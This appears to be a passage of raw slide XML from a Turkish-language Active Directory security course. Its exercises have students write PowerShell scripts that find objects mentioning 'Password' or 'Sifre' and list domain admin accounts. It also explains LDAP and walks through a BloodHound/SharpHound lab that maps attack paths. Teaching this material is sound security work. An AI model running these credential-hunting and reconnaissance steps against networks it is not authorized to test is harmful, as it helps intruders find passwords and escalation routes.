              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> Password, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, Parola, Sifre </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>vb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>kelimeler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>geçen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>objeleri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>tespit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>eden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>scriptini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>yazınız</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Bilgisayar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> hostname </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>işletim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>sistemi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>bilgilerini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> CSV </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>olarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>dışarı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>aktaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>scriptini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>yazınız</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Ödev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Domain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>ortamındaki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>tüm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> admin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>hesapları</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>tespit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>eden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>scriptini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>yazınız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37121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7258F-D7E8-0412-6B8E-9454305EA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C5534-0533-0332-EB32-53F6F9DE7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Active Directory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>verileri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>hiyerarşik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şekilde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>saklamak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>için</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> LDAP (Lightweight Directory Access Protocol) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>protokolü</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>kullanmaktadır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>LDAP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>protokolü</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> DC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>sunucularında</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> 389 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> 636 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>numaralı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>portlarda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>çalışmaktadır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Domain Controller </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>sunucuları</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>üzerinden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> LDAP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>protokolü</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>kullanılarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>bilgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>toplama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>yönetim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>herhangi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değişiklik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>olduğunda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>notifikasyon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>üretme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>gibi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çok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>farklı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>işlem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>yapılabilmektedir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>LDAP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>üzerinden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>bilgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>toplama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>manuel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>olarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>veya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>çeşitli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>araçlar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>üzerinden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>gerçekleştirilebilmektedir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9542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A67B4-4915-517A-95EC-324687D15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BloodHound</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SharpHound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6556D-277D-2431-6193-70990FF4D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Active Directory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ortamındaki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>birçok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ilişkiyi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>graf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>arayüzü</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>üzerinde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>görselleştirmektedir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Bu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>sayede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objeden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>diğerine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>saldırı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>yollarını</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>kolayca</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>tespit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>edebilmektedir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Çalıştırılan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>kullanıcının</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>yetkisine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>göre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çok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>obje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>tipini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ilişki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>türünü</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>elde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>edebilmektedir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>LDAP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> WINNT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>protokollerini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>kullanmaktadır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. 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800" dirty="0" err="1"/>
              <a:t>SharpHound</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>: Veri </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>toplama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>ajanı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>BloodHound</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>: Analiz </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>arayüzü</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Neo4j: Graf </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Veritabanı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B0069-18BD-1241-BC0C-C8297D2F8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643" y="4001294"/>
            <a:ext cx="3048157" cy="210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3402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A8DA-A7A0-6883-EB4A-0C52F7B6D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BloodHound</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SharpHound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B88D95-E1F2-BB7B-7230-1DF799DF9E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1887" y="1825625"/>
            <a:ext cx="73482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1687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E07EC-D8B9-3A09-B029-88ECEB219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Uygulama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> #8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43712-1F57-019A-4A09-A5EFF1894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RDWS01 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>sunucusunda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>oturum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>açınız</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>• SharpHound.exe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>aracını</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>çalıştırınız</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>çıktıyı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>bilgisayarınıza</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>kopyalayınız</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. (https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>• Neo4j </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>veritabanını</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>bilgisayarınıza</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>kurunuz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. (https://neo4j.com/download/ ) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>• </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>BloodHound</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>uygulamasını</a:t>
            </a:r>
            <a:r>
